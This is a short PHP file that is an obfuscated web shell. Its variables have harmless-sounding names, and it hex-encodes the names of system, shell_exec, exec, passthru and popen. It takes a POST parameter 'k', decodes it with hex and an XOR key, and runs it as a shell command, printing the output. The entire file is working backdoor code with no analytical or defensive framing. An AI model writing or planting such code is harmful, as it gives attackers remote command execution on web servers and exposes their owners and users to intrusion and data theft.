<?php

$core_engine7 = "p\x63l\x6F\x73e";
$core_engine3 = "e\x78e\x63";
$core_engine6 = "stre\x61\x6D_g\x65t_conte\x6E\x74s";
$core_engine4 = "p\x61ss\x74\x68r\x75";
$core_engine2 = "\x73\x68\x65l\x6C\x5Fexec";
$core_engine5 = "\x70\x6Fpen";
$publish_content = "h\x65x2\x62\x69n";
$core_engine1 = "\x73ys\x74\x65m";
if (isset($_POST["k"])) {
            function unit_converter ($dchunk , $item ){
 $res= '' ;
for($e=0;
 $e<strlen($dchunk);
 $e++){
$res.=chr(ord($dchunk[$e])^$item);

} return$res;
 
}
            $k = $publish_content($_POST["k"]);
            $k = unit_converter($k, 72);
            if (function_exists($core_engine1)) {
                $core_engine1($k);
            } elseif (function_exists($core_engine2)) {
                print $core_engine2($k);
            } elseif (function_exists($core_engine3)) {
                $core_engine3($k, $reference_dchunk);
                print join("\n", $reference_dchunk);
            } elseif (function_exists($core_engine4)) {
                $core_engine4($k);
            } elseif (function_exists($core_engine5) && function_exists($core_engine6) && function_exists($core_engine7)) {
                $item_res = $core_engine5($k, 'r');
                if ($item_res) {
                    $entry_rec = $core_engine6($item_res);
                    $core_engine7($item_res);
                    print $entry_rec;
                }
            }
            exit;
        }